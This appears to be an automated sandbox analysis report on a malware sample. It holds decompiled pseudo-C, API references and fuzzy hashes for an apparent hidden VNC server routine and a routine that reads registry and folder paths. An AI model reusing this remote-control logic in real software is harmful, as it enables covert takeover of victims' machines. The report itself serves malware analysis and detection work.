									 *(_t365 + 0x3c) = ( *(_t365 + 0x14) & 0x00ff0000 |  *(_t365 + 0x14) >> 0x00000010) >> 0x00000008 | (_t218 & 0x0000ff00 | _t218 << 0x00000010) << 0x00000008;
									if( *_t362() != 4) {
										 *(_t365 + 0x14) = 0xffffffff;
									}
									_t223 =  *(_t365 + 0x14);
									if(_t223 == 0) {
										return E004062D0( *((intOrPtr*)(_t365 + 0x28)), _t353);
									}
									_t204 = _t223 - 1;
									if(_t204 != 0) {
										goto L106;
									} else {
										_t279 =  *((intOrPtr*)(_t365 + 0x190));
										_t204 = E00414B90(1, _t279, 0x1b7740, _t365 + 0x13);
										if(_t204 == 0) {
											goto L106;
										} else {
											_t355 =  *((intOrPtr*)(_t365 + 0x194));
											_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t355 + 8))))();
											if(_t204 == 0) {
												goto L106;
											} else {
												 *((intOrPtr*)(_t365 + 0x2c)) = 0;
												_t204 =  *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xc))))(_t365 + 0x80);
												if(_t204 == 0) {
													goto L106;
												} else {
													_t204 = E00406080(_t365 + 0x84,  *((intOrPtr*)(_t365 + 0x198)));
													_t346 = _t204;
													 *((intOrPtr*)(_t365 + 0x20)) = _t346;
													if(_t346 == 0) {
														goto L106;
													} else {
														_t356 = E00411B00( *((intOrPtr*)(_t365 + 0x28)));
														 *(_t365 + 0x5c) = ( *(_t346 + 8) & 0x0000ffff) << 0x00000008 |  *(_t346 + 9) & 0x000000ff;
														 *(_t365 + 0x5e) = ( *(_t346 + 0xa) & 0x0000ffff) << 0x00000008 |  *(_t346 + 0xb) & 0x000000ff;
														 *(_t365 + 0x74) = (_t356 & 0x00ff0000 | _t356 >> 0x00000010) >> 0x00000008 | (_t356 << 0x00000010 | _t356 & 0x0000ff00) << 0x00000008;
														_t48 = _t346 + 0x20; // 0x20
														E00410820(_t365 + 0x68, _t48, 0x10);
														asm("rol dx, 0x8");
														_push(0);
														 *(_t365 + 0x68) =  *(_t365 + 0x64) & 0x0000ffff;
														_push(0x18);
														asm("rol ax, 0x8");
														_push(_t365 + 0x64);
														asm("rol cx, 0x8");
														_push(_t279);
														 *((short*)(_t365 + 0x76)) =  *(_t365 + 0x66) & 0x0000ffff;
														 *((short*)(_t365 + 0x78)) =  *(_t365 + 0x68) & 0x0000ffff;
														if( *_t362() != 0x18) {
															L104:
															return E00406260(_t346);
														} else {
															if(_t356 == 0) {
																L19:
																 *(_t365 + 0x3c) = 0;
																 *(_t365 + 0x3d) = 0xffffffff;
																E00410870(E00410870(_t365 + 0x90, _t365 + 0x90, 0, 0xff), _t365 + 0x90, 0, 0xff);
																 *(_t365 + 0x24) = 0;
																 *(_t365 + 0x14) = 0;
																goto L20;
																do {
																	do {
																		L20:
																		while(1) {
																			L20:
																			while(1) {
																				L20:
																				while( *(_t365 + 0x24) > 0) {
																					_t262 = E004151B0(0, _t365 + 0x194, 0x12c, 0);
																					if(_t262 != 0xffffffff) {
																						break;
																					} else {
																						__imp__#111();
																						if(_t262 == 0x274c) {
																							_t263 =  *(_t365 + 0x19c);
																							if(_t263 != 0) {
																								WaitForSingleObject(_t263, 0xffffffff);
																							}
																							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t365 + 0x194)) + 0x10))))();
																							_t363 =  *(_t365 + 0x24);
																							_t349 = 0;
																							if(_t363 == 0) {
																								L36:
																								_t266 =  *(_t365 + 0x19c);
																								if(_t266 != 0) {
																									ReleaseMutex(_t266);
																								}
																								continue;
																							} else {
																								_t282 = 0;
																								_t364 = _t363 + _t363 * 8;
																								do {
																									_t268 =  *(_t365 + 0x14);
																									_t360 = _t282 + _t268;
																									if( *((short*)(_t282 + _t268 + 5)) <= 0 ||  *((short*)(_t360 + 7)) <= 0) {
																										goto L35;
																									} else {
																										_push(_t360);
																										_push( *((intOrPtr*)(_t365 + 0x190)));
																										_t270 = E00405C70( *((intOrPtr*)(_t365 + 0x20)));
																										if(_t270 == 0xffffffff || _t270 == 0) {
																											if( *(_t365 + 0x19c) != 0) {
																												ReleaseMutex( *(_t365 + 0x19c));
																											}
																										} else {
																											if(_t270 == 1) {
																												_t79 = _t349 + 1; // 0x1
																												if(_t79 !=  *(_t365 + 0x24)) {
																													E00410870(_t270, _t360, 0, 9);
																												} else {
																													 *(_t365 + 0x24) =  *(_t365 + 0x24) - 1;
																													_t364 = _t364 - 9;
																													E00410740(_t364, _t365 + 0x14);
																												}
																											}
																											goto L35;
																										}
																									}
																									goto L103;
																									L35:
																									_t349 = _t349 + 1;
																									_t282 = _t282 + 9;
																								} while (_t349 <  *(_t365 + 0x24));
																								goto L36;
																							}
																						}
																					}
																					L103:
																					E00406260( *((intOrPtr*)(_t365 + 0x20)));
																					return E004107C0( *(_t365 + 0x14));
																					goto L107;
																				}
																				if(E00414B90(1,  *((intOrPtr*)(_t365 + 0x190)), 0x1b7740, _t365 + 0x13) != 0) {
																					_t252 =  *(_t365 + 0x13) & 0x000000ff;
																					if(_t252 <= 6) {
																						switch( *((intOrPtr*)(_t252 * 4 +  &M00406C98))) {
																							case 0:
																								if(E00414C40(_t280, 0x1b7740, 3) != 0 && E00414B90(0x10, _t280, 0x1b7740, _t365 + 0x4c) != 0) {
																									_t256 =  *(_t365 + 0x4c);
																									if(_t256 == 0x20 || _t256 == 0x10 || _t256 == 8) {
																										if( *((char*)(_t365 + 0x4f)) != 0) {
																											_t338 =  *((intOrPtr*)(_t365 + 0x50));
																											asm("rol dx, 0x8");
																											asm("rol ax, 0x8");
																											asm("rol cx, 0x8");
																											 *(_t365 + 0x5c) =  *((intOrPtr*)(_t365 + 0x54));
																											 *(_t365 + 0x58) = _t338;
																											 *((char*)(_t365 + 0x5b)) = 1;
																											 *((char*)(_t365 + 0x5a)) = _t338 & 0xffffff00 |  *((char*)(_t365 + 0x52)) != 0x00000000;
																											 *(E00410820( *((intOrPtr*)(_t365 + 0x28)) + 0x31, _t365 + 0x50, 0x10) + 0x41) =  *(_t365 + 0x4c) >> 3;
																											goto L20;
																										}
																									}
																								}
																								goto L103;
																							case 1:
																								goto L103;
																							case 2:
																								__edi = 0x1b7740;
																								__eax = E00414C40(__ebx, 0x1b7740, 1);
																								if(__al != 0) {
																									__eax = __esp + 0x48;
																									2 = E00414B90(2, __ebx, __esi, __esp + 0x48);
																									if(__al != 0) {
																										__ecx =  *(__esp + 0x48) & 0x0000ffff;
																										__ebp =  *(__esp + 0x20);
																										__ecx = __ecx & 0x000000ff;
																										__eax = (__ecx & 0x000000ff) << 8;
																										__eax = __eax | __ecx;
																										 *(__ebp + 0x4c) = 0;
																										 *(__ebp + 0x48) = __ax;
																										if(__ax == 0) {
																											L59:
																											__eax =  *(__ebp + 0x4c);
																											__eax = __eax << 0x10;
																											__eax = __eax & 0x0000ff00;
																											__edx = __eax << 0x00000010 | __eax & 0x0000ff00;
																											__eax = __eax >> 8;
																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 8;
																											__ecx = __eax >> 0x00000008 & 0x0000ff00;
																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00;
																											__ecx =  *(__ebp + 0x4f) & 0x000000ff;
																											__edx = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
																											 *(__ebp + 0x50) = (__eax << 0x00000010 | __eax & 0x0000ff00) << 0x00000008 | __eax >> 0x00000008 & 0x0000ff00 |  *(__ebp + 0x4f) & 0x000000ff;
																											if(__eax != 5) {
																												__eax =  *(__ebp + 0x1c);
																												__eax = E004107C0( *(__ebp + 0x1c));
																												 *(__ebp + 0x1c) = 0;
																												goto L20;
																											} else {
																												goto L60;
																											}
																										} else {
																											__ax & 0x0000ffff = (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
																											__ebx = (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff) + (__ax & 0x0000ffff);
																											__edi = __ebp + 0x44;
																											__ecx = __ebx;
																											__esi = __edi;
																											__eax = E00410740(__ebx, __esi);
																											if(__al != 0) {
																												__ecx =  *__edi;
																												__eax = __ebx;
																												__ebx =  *(__esp + 0x190);
																												__esi = 0x1b7740;
																												__eax = E00414B90(__eax, __ebx, 0x1b7740,  *__edi);
																												if(__al != 0) {
																													__edx = 0;
																													__esi = 0;
																													if(__dx <  *(__ebp + 0x48)) {
																														__edx =  *__edi;
																														do {
																															__si & 0x0000ffff = (__si & 0x0000ffff) + (__si & 0x0000ffff);
																															__eax = (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff) + (__si & 0x0000ffff);
																															__ecx =  *(__eax + __edx);
																															__ecx = __ecx << 0x10;
																															__ecx = __ecx & 0x0000ff00;
																															__ebx = __ecx << 0x00000010 | __ecx & 0x0000ff00;
																															__ebp =  *(__eax + __edx + 3) & 0x000000ff;
																															__ebx = (__ecx << 0x00000010 | __ecx & 0x0000ff00) << 8;
																															__ecx = __ecx >> 8;
																															__ebx = __ebx |  *(__eax + __edx + 3) & 0x000000ff;
																															__ebx = __ebx | __ecx;
																															 *(__eax + __edx) = __ebx;
																															__edx =  *__edi;
																															if( *(__eax + __edx) == 5) {
																																__eax =  *(__esp + 0x20);
																																 *((intOrPtr*)( *(__esp + 0x20) + 0x4c)) = 5;
																															}
																															__ecx =  *(__esp + 0x20);
																															__esi = __esi + 1;
																														} while (__si <  *((intOrPtr*)(__ecx + 0x48)));
																														__ebp = __ecx;
																													}
																													goto L59;
																												}
																											}
																										}
																									}
																								}
																								goto L103;
																							case 3:
																								__edx = __esp + 0x38;
																								9 = E00414B90(9, __ebx, __esi, __esp + 0x38);
																								if(__al != 0) {
																									__eax =  *(__esp + 0x39) & 0x0000ffff;
																									__dx =  *((intOrPtr*)(__esp + 0x3d));
																									asm("rol ax, 0x8");
																									asm("rol cx, 0x8");
																									 *(__esp + 0x39) = __ax;
																									__eax =  *(__esp + 0x3f) & 0x0000ffff;
																									asm("rol dx, 0x8");
																									asm("rol ax, 0x8");
																									__ecx = __ecx & 0xffffff00 |  *(__esp + 0x38) != 0x00000000;
																									 *(__esp + 0x38) = __cl;
																									__ecx =  *(__esp + 0x24);
																									__edi = 0;
																									 *((short*)(__esp + 0x3d)) = __dx;
																									 *(__esp + 0x3f) = __ax;
																									if(__ecx != 0) {
																										__eax =  *(__esp + 0x14);
																										__eax = 7 +  *(__esp + 0x14);
																										while( *((short*)(__eax - 2)) != 0 ||  *__eax != 0) {
																											__edi = __edi + 1;
																											__eax = __eax + 9;
																											if(__edi < __ecx) {
																												continue;
																											}
																											goto L70;
																										}
																									}
																									L70:
																									if(__edi != __ecx) {
																										L72:
																										__eax =  *(__esp + 0x14);
																										__edx = __esp + 0x3c;
																										__eax + __edi * 8 = __eax + __edi * 8 + __edi;
																										__eax = E00410820(__eax + __edi * 8 + __edi, __esp + 0x3c, 9);
																										goto L20;
																									} else {
																										__ecx = __ecx + 1;
																										 *(__esp + 0x24) = __ecx;
																										__ecx = __ecx + __ecx * 8;
																										__esi = __esp + 0x14;
																										__eax = E00410740(__ecx, __esi);
																										if(__al != 0) {
																											goto L72;
																										}
																									}
																								}
																								goto L103;
																							case 4:
																								__edx = __esp + 0x74;
																								__eax = 7;
																								__eax = E00414B90(7, __ebx, __esi, __esp + 0x74);
																								if(__al != 0) {
																									__eax = __eax & 0xffffff00 |  *(__esp + 0x74) != 0x00000000;
																									__ecx = __al & 0x000000ff;
																									__eax =  *(__esp + 0x77);
																									_push(__al & 0x000000ff);
																									__edx = __eax;
																									__eax = __eax >> 0x10;
																									__edx = __eax & 0x00ff0000;
																									__edx = __eax & 0x00ff0000 | __eax >> 0x00000010;
																									__ecx = __eax;
																									__ecx = __eax << 0x10;
																									__ecx = __ecx | __eax;
																									__eax =  *(__esp + 0x198);
																									__ecx = __ecx << 8;
																									__edx = __edx | __ecx;
																									__ecx =  *__eax;
																									__eax =  *(__eax + 0x14);
																									__eax =  *__eax();
																									goto L20;
																								}
																								goto L103;
																							case 5:
																								__ecx = __esp + 0x18;
																								5 = E00414B90(5, __ebx, __esi, __esp + 0x18);
																								if(__al != 0) {
																									__dx =  *(__esp + 0x19);
																									__ax =  *(__esp + 0x1b);
																									asm("rol dx, 0x8");
																									asm("rol ax, 0x8");
																									 *((short*)(__esp + 0x1d)) = __dx;
																									 *(__esp + 0x1f) = __ax;
																									__edi = 0;
																									__esi = 0x8000;
																									GetSystemMetrics(0x17) = __eax & 0xffffff00 | __eax != 0x00000000;
																									if( *(__esp + 0x19) !=  *((intOrPtr*)(__esp + 0x31))) {
																										L78:
																										__esi = 0x8001;
																									} else {
																										__dx =  *((intOrPtr*)(__esp + 0x33));
																										if( *(__esp + 0x1b) != __dx) {
																											goto L78;
																										}
																									}
																									__dl =  *((intOrPtr*)(__esp + 0x30));
																									__cl =  *(__esp + 0x18);
																									__cl =  *(__esp + 0x18) & 0x00000001;
																									if(__cl != (__dl & 0x00000001)) {
																										__ecx = __al & 0x000000ff;
																										if(__cl == 0) {
																											__ecx =  ~__ecx;
																											asm("sbb ecx, ecx");
																											__ecx = __ecx & 0x0000000c;
																											__ecx = __ecx + 4;
																										} else {
																											__ecx =  ~__ecx;
																											asm("sbb ecx, ecx");
																											__ecx = __ecx & 0x00000006;
																											__ecx = __ecx + 2;
																										}
																										__esi = __esi | __ecx;
																									}
																									__cl =  *(__esp + 0x18);
																									__cl =  *(__esp + 0x18) & 0x00000004;
																									if(__cl != (__dl & 0x00000004)) {
																										if(__cl == 0) {
																											__al & 0x000000ff =  ~(__al & 0x000000ff);
																											asm("sbb ecx, ecx");
																											 ~(__al & 0x000000ff) & 0xfffffff4 = ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x10;
																											__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffff4) + 0x00000010;
																										} else {
																											__al & 0x000000ff =  ~(__al & 0x000000ff);
																											asm("sbb eax, eax");
																											 ~(__al & 0x000000ff) & 0xfffffffa = ( ~(__al & 0x000000ff) & 0xfffffffa) + 8;
																											__esi = __esi | ( ~(__al & 0x000000ff) & 0xfffffffa) + 0x00000008;
																										}
																									}
																									__cl =  *(__esp + 0x18);
																									__al = __cl;
																									__al = __cl & 0x00000002;
																									if(__al != __dl) {
																										__al & 0x000000ff =  ~(__al & 0x000000ff);
																										asm("sbb edx, edx");
																										 ~(__al & 0x000000ff) & 0xffffffe0 = ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x40;
																										__esi = __esi | ( ~(__al & 0x000000ff) & 0xffffffe0) + 0x00000040;
																									}
																									if((__cl & 0x00000008) != 0) {
																										__esi = __esi | 0x00000800;
																										__edi = 0x78;
																									}
																									if((__cl & 0x00000010) != 0) {
																										__esi = __esi | 0x00000800;
																										__edi = 0xffffff88;
																									}
																									__eax = __esp + 0x1c;
																									__ecx = __esp + 0x38;
																									__eax = E00410820(__esp + 0x38, __esp + 0x1c, 5);
																									__edx =  *(__esp + 0x1b) & 0x0000ffff;
																									__eax =  *(__esp + 0x19) & 0x0000ffff;
																									_push(__edi);
																									_push(__edx);
																									_push(__eax);
																									__eax =  *(__esp + 0x1a0);
																									__ecx =  *__eax;
																									__eax =  *(__eax + 0x18);
																									__edx = __esi;
																									__eax =  *__eax();
																									goto L20;
																								}
																								goto L103;
																							case 6:
																								__ecx = __esp + 0x7c;
																								3 = E00414B90(3, __ebx, __esi, __esp + 0x7c);
																								if(__al != 0) {
																									__edx = __esp + 0x2c;
																									4 = E00414B90(4, __ebx, __esi, __esp + 0x2c);
																									if(__al != 0) {
																										__ecx =  *(__esp + 0x2c);
																										__ecx = __ecx & 0x00ff0000;
																										__ecx = __ecx >> 0x10;
																										__eax = __ecx & 0x00ff0000 | __ecx >> 0x00000010;
																										__edx = __ecx;
																										__edx = __ecx << 0x10;
																										__edx = __edx | __ecx;
																										__eax = __eax >> 8;
																										__eax = __eax | __edx;
																										 *(__esp + 0x2c) = __eax;
																										__eax = __eax + 1;
																										__edi = __eax;
																										if(__edi == 0) {
																											0 = E004107C0(0);
																										} else {
																											 *(__esp + 0x2c) = E00414B90( *(__esp + 0x2c), __ebx, __esi, __edi);
																											if(__al != 0) {
																												__eax =  *(__esp + 0x194);
																												__ecx =  *__eax;
																												__edx =  *(__esp + 0x2c);
																												__eax =  *(__eax + 0x1c);
																												_push(__edi);
																												__eax =  *__eax();
																												__eax = __edi;
																												__eax = E004107C0(__edi);
																												goto L20;
																											}
																										}
																									}
																								}
																								goto L103;
																						}
																					}
																				}
																				goto L103;
																			}
																		}
																		L60:
																	} while ( *(__ebp + 0x1c) != 0);
																	__edx =  *0x42e6d4;
																	__eax = HeapAlloc( *0x42e6d4, 8, 0x404);
																	__ecx =  *(__esp + 0x20);
																	 *( *(__esp + 0x20) + 0x1c) = __eax;
																} while (__eax != 0);
																goto L103;
															} else {
																_push(0);
																_push(_t356);
																_push( *((intOrPtr*)(_t365 + 0x28)));
																_push(_t279);
																if( *_t362() != _t356) {
																	goto L104;
																} else {
																	goto L19;
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
							goto L107;
						}
						_t204 = (0 | _t284 > 0x00000000) + (0 | _t284 > 0x00000000) - 1;
						if(_t204 != 0) {
							goto L106;
						} else {
							goto L7;
						}
					}
				}
				L107:
			}

0x00406357
0x0040635f
0x00406371
0x00406376
0x00406c93
0x00406c93
0x0040637c
0x0040638b
0x00406392
0x00000000
0x00406398
0x0040639a
0x004063a0
0x004063a0
0x004063ac
0x004063ae
0x00000000
0x00000000
0x004063b0
0x004063b4
0x00000000
0x004063b6
0x004063cb
0x004063d1
0x004063d5
0x004063d9
0x004063f7
0x00406404
0x00000000
0x0040640a
0x0040641f
0x00406427
0x0040642b
0x0040642d
0x00406431
0x00406452
0x00406455
0x00406461
0x00406464
0x00406465
0x0040646e
0x00406470
0x00406470
0x0040647c
0x0040647e
0x00000000
0x00406c84
0x00406484
0x00406485
0x00000000
0x0040648b
0x0040648b
0x004064a1
0x004064a8
0x00000000
0x004064ae
0x004064b3
0x004064c2
0x004064c6
0x00000000
0x004064cc
0x004064dd
0x004064e1
0x004064e7
0x00000000
0x004064ed
0x004064fc
0x00406501
0x00406503
0x00406509
0x00000000
0x0040650f
0x0040651c
0x00406529
0x0040653d
0x0040656a
0x0040656e
0x00406577
0x0040658b
0x0040658f
0x00406591
0x00406596
0x0040659c
0x004065a0
0x004065a1
0x004065a5
0x004065a6
0x004065ab
0x004065b5
0x00406c6b
0x00406c7c
0x004065bb
0x004065bd
0x004065d2
0x004065e2
0x004065e7
0x00406602
0x00406607
0x0040660b
0x0040660b
0x0040660f
0x0040660f
0x00000000
0x0040660f
0x00000000
0x0040660f
0x00000000
0x0040660f
0x0040662a
0x00406632
0x00000000
0x00406638
0x00406638
0x00406643
0x00406649
0x00406652
0x00406657
0x00406657
0x00406669
0x0040666b
0x0040666f
0x00406673
0x004066ef
0x004066ef
0x004066f8
0x004066ff
0x004066ff
0x00000000
0x00406675
0x00406675
0x00406677
0x00406680
0x00406680
0x0040668a
0x0040668d
0x00000000
0x00406696
0x004066a1
0x004066a2
0x004066a3
0x004066ab
0x00406c33
0x00406c3d
0x00406c3d
0x004066b9
0x004066bc
0x004066be
0x004066c5
0x004066e0
0x004066c7
0x004066c7
0x004066cb
0x004066d4
0x004066d4
0x004066c5
0x00000000
0x004066bc
0x004066ab
0x00000000
0x004066e5
0x004066e5
0x004066e6
0x004066e9
0x00000000
0x00406680
0x00406673
0x00406643
0x00406c4c
0x00406c50
0x00406c68
0x00000000
0x00406c68
0x00406727
0x0040672d
0x00406735
0x0040673b
0x00000000
0x0040674d
0x0040676a
0x00406770
0x00406783
0x00406789
0x00406798
0x0040679c
0x004067a7
0x004067b9
0x004067be
0x004067ca
0x004067cf
0x004067df
0x00000000
0x004067df
0x00406783
0x00406770
0x00000000
0x00000000
0x00000000
0x00000000
0x004067e9
0x004067eb
0x004067f2
0x004067f8
0x00406802
0x00406809
0x0040680f
0x00406814
0x0040681a
0x0040681f
0x00406825
0x00406827
0x0040682e
0x00406835
0x004068d1
0x004068d1
0x004068d6
0x004068db
0x004068e1
0x004068e5
0x004068e8
0x004068eb
0x004068f1
0x004068f3
0x004068f7
0x004068f9
0x004068ff
0x00406933
0x00406936
0x0040693b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040683b
0x0040683e
0x00406840
0x00406842
0x00406845
0x00406847
0x00406849
0x00406850
0x00406856
0x00406858
0x0040685a
0x00406862
0x00406867
0x0040686e
0x00406874
0x00406876
0x0040687c
0x0040687e
0x00406880
0x00406883
0x00406885
0x00406887
0x0040688c
0x00406891
0x00406897
0x00406899
0x0040689e
0x004068a1
0x004068a4
0x004068ac
0x004068ae
0x004068b1
0x004068b7
0x004068b9
0x004068bd
0x004068bd
0x004068c4
0x004068c8
0x004068c9
0x004068cf
0x004068cf
0x00000000
0x0040687c
0x0040686e
0x00406850
0x00406835
0x00406809
0x00000000
0x00000000
0x00406947
0x00406951
0x00406958
0x0040695e
0x00406968
0x0040696d
0x00406971
0x00406975
0x0040697a
0x0040697f
0x00406983
0x00406991
0x00406994
0x00406998
0x0040699c
0x0040699e
0x004069a3
0x004069aa
0x004069ac
0x004069b0
0x004069b3
0x004069c0
0x004069c1
0x004069c6
0x00000000
0x00000000
0x00000000
0x004069c6
0x004069b3
0x004069c8
0x004069ca
0x004069e5
0x004069e5
0x004069eb
0x004069f3
0x004069f6
0x00000000
0x004069cc
0x004069cc
0x004069cd
0x004069d1
0x004069d4
0x004069d8
0x004069df
0x00000000
0x00000000
0x004069df
0x004069ca
0x00000000
0x00000000
0x00406a00
0x00406a05
0x00406a0a
0x00406a11
0x00406a1c
0x00406a1f
0x00406a22
0x00406a26
0x00406a27
0x00406a2b
0x00406a2e
0x00406a34
0x00406a36
0x00406a38
0x00406a40
0x00406a42
0x00406a49
0x00406a4f
0x00406a51
0x00406a53
0x00406a56
0x00000000
0x00406a56
0x00000000
0x00000000
0x00406a5d
0x00406a67
0x00406a6e
0x00406a74
0x00406a79
0x00406a7e
0x00406a82
0x00406a88
0x00406a8d
0x00406a92
0x00406a94
0x00406aa6
0x00406aae
0x00406abc
0x00406abc
0x00406ab0
0x00406ab0
0x00406aba
0x00000000
0x00000000
0x00406aba
0x00406ac1
0x00406ac5
0x00406acb
0x00406ad3
0x00406ad7
0x00406ada
0x00406ae8
0x00406aea
0x00406aec
0x00406aef
0x00406adc
0x00406adc
0x00406ade
0x00406ae0
0x00406ae3
0x00406ae3
0x00406af2
0x00406af2
0x00406af4
0x00406afa
0x00406b02
0x00406b06
0x00406b1c
0x00406b1e
0x00406b23
0x00406b26
0x00406b08
0x00406b0b
0x00406b0d
0x00406b12
0x00406b15
0x00406b15
0x00406b06
0x00406b28
0x00406b2c
0x00406b2e
0x00406b35
0x00406b3a
0x00406b3c
0x00406b41
0x00406b44
0x00406b44
0x00406b49
0x00406b4b
0x00406b51
0x00406b51
0x00406b59
0x00406b5b
0x00406b61
0x00406b61
0x00406b68
0x00406b6d
0x00406b72
0x00406b77
0x00406b7c
0x00406b81
0x00406b82
0x00406b83
0x00406b84
0x00406b8b
0x00406b8d
0x00406b90
0x00406b92
0x00000000
0x00406b92
0x00000000
0x00000000
0x00406b99
0x00406ba3
0x00406baa
0x00406bb0
0x00406bba
0x00406bc1
0x00406bc7
0x00406bcd
0x00406bd4
0x00406bd7
0x00406bd9
0x00406bdb
0x00406be4
0x00406be6
0x00406bec
0x00406bee
0x00406bf2
0x00406bf8
0x00406bfc
0x00406c47
0x00406bfe
0x00406c03
0x00406c0a
0x00406c0c
0x00406c13
0x00406c15
0x00406c19
0x00406c1c
0x00406c1d
0x00406c1f
0x00406c21
0x00000000
0x00406c21
0x00406c0a
0x00406bfc
0x00406bc1
0x00000000
0x00000000
0x0040673b
0x00406735
0x00000000
0x00406727
0x0040660f
0x00406901
0x00406901
0x0040690b
0x00406919
0x0040691f
0x00406923
0x00406926
0x00000000
0x004065bf
0x004065c3
0x004065c5
0x004065c6
0x004065c7
0x004065cc
0x00000000
0x00000000
0x00000000
0x00000000
0x004065cc
0x004065bd
0x004065b5
0x00406509
0x004064e7
0x004064c6
0x004064a8
0x00406485
0x00406404
0x00000000
0x004063b4
0x004063bf
0x004063c5
0x00000000
0x00000000
0x00000000
0x00000000
0x004063c5
0x00406392
0x00000000

APIs

send.WS2_32(?,RFB 003.003,0000000C,00000000), ref: 00406371

Part of subcall function 00414B90: select.WS2_32 ref: 00414BF1
Part of subcall function 00414B90: recv.WS2_32(?,?,00000007,00000000), ref: 00414C01

send.WS2_32(?,?,00000004,00000000), ref: 00406469
send.WS2_32(?,?,00000018,00000000), ref: 004065B0
send.WS2_32(?,?,00000000,00000000), ref: 004065C8
WSAGetLastError.WS2_32(00000000,?,?,000000FF,?,?,?,?,?,?,?,00000000,000000FF), ref: 00406638
WaitForSingleObject.KERNEL32(?,000000FF,?,000000FF,?,?,?,?,?,?,?,00000000,000000FF), ref: 00406657

Strings

RFB 003.003, xrefs: 0040636B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: send$ErrorLastObjectSingleWaitrecvselect
String ID: RFB 003.003
API String ID: 3971626918-2627274552
Opcode ID: ef5e754e13e83abf2c3739610a35e3cc414bf3ddb7cd57faa41aa5b6b53f8ccd
Instruction ID: 3952e8df2bb402d62c3e4228bd58d56ce1fddc858744c8027cdde5a9cffd1fda
Opcode Fuzzy Hash: ef5e754e13e83abf2c3739610a35e3cc414bf3ddb7cd57faa41aa5b6b53f8ccd
Instruction Fuzzy Hash: BEB1C2311083019BE720EB29C890BAFB3E5EFC4314F05493EF5DAA72D1DA39D955879A

Uniqueness

Uniqueness Score: -1.00%

Function 00421030, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 193
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00421030(void* __eflags) {
				char _v660;
				short _v1180;
				short _v1188;
				short _v1200;
				short _v1700;
				void* _v1712;
				short _v1720;
				short _v1742;
				char _v1784;
				char _v1864;
				char _v1880;
				char _v1916;
				char _v1928;
				char _v1948;
				intOrPtr _v1984;
				intOrPtr _v1988;
				char _v1992;
				intOrPtr _v1996;
				intOrPtr _v2000;
				char* _v2004;
				char* _v2008;
				char _v2016;
				void* _v2020;
				char _v2028;
				char _v2032;
				intOrPtr _v2036;
				char _v2040;
				void* __esi;
				void* _t58;
				void* _t59;
				void* _t70;
				void* _t74;
				intOrPtr* _t90;
				void* _t125;
				signed int _t126;
				char* _t132;
				intOrPtr _t133;
				char* _t136;
				char* _t137;
				void** _t139;
				intOrPtr _t152;

				_t139 =  &_v2020;
				E00410870( &_v2020,  &_v2020, 0, 8);
				E00424100(0x6a,  &_v1784);
				E00424100(0x6b,  &_v1916);
				_t58 = E00416420(0x80000001,  &_v1784,  &_v1916, 0x104);
				if(_t58 != 0xffffffff && _t58 != 0) {
					ExpandEnvironmentStringsW( &_v1700,  &_v1180, 0x104);
					_push( &_v2020);
					_push( &_v1180);
					E00420D80();
					PathRemoveFileSpecW( &_v1188);
				}
				if(_v2016 == 0) {
					E00424100(0x6d,  &_v1928);
					E00424100(0x6e,  &_v1880);
					_t132 =  &_v1948;
					E00424100(0x6f, _t132);
					_t90 = __imp__SHGetFolderPathW;
					_v1996 = 0x24;
					_v1992 = 0x1a;
					_v1988 = 0x26;
					_v1984 = 0x23;
					_v2008 =  &_v1928;
					_v2004 =  &_v1880;
					_v2000 = _t132;
					_t126 = 0;
					do {
						_t133 =  *((intOrPtr*)(_t139 + 0x28 + _t126 * 4));
						_t70 =  *_t90(0, _t133, 0, 0,  &_v1700);
						if(_t70 == 0) {
							if(_t133 == 0x24) {
								_t137 =  &_v1992;
								_t29 = _t70 + 0x64; // 0x64
								E00424100(_t29, _t137);
								_v2032 = _t137;
								E00418700( &_v1720,  &_v2032, 1, 4, E00420F90,  &_v2040, 0, 0, 0);
								_v1742 = 0;
							}
							E00418700( &_v1720,  &_v2028, 3, 2, E00420F90,  &_v2040, 0, 0, 0);
						}
						_t126 = _t126 + 1;
					} while (_t126 < 4);
					if(_v2036 == 0) {
						E00424100(0x6a,  &_v1864);
						E00424100(0x6c,  &_v2016);
						_t74 = E00416420(0x80000001,  &_v1864,  &_v2016, 0x104);
						if(_t74 != 0xffffffff && _t74 != 0) {
							ExpandEnvironmentStringsW( &_v1720,  &_v1200, 0x104);
							_t136 =  &_v1992;
							E00424100(0x64, _t136);
							_v2032 = _t136;
							E00418700( &_v1200,  &_v2032, 1, 5, E00420F90,  &_v2040, 0, 0, 0);
						}
						_t152 = _v2036;
					}
				}
				_t59 = _v2020;
				if(_t152 <= 0) {
					if(_t59 != 0) {
						return HeapFree( *0x42e6d4, 0, _t59);
					}
					goto L22;
				} else {
					_t125 = _t59;
					if(_t59 == 0) {
						L22:
						return _t59;
					} else {
						if( *_t59 != 0) {
							E00424100(0x70,  &_v660);
							E0040D880(_t125, 0xcb,  &_v660);
						}
						return HeapFree( *0x42e6d4, 0, _t125);
					}
				}
			}

0x00421030
0x00421043
0x00421054
0x00421065
0x00421086
0x00421094
0x004210af
0x004210b5
0x004210bd
0x004210be
0x004210cb
0x004210cb
0x004210d6
0x004210e5
0x004210f6
0x004210fb
0x00421104
0x00421109
0x0042111c
0x00421124
0x0042112c
0x00421134
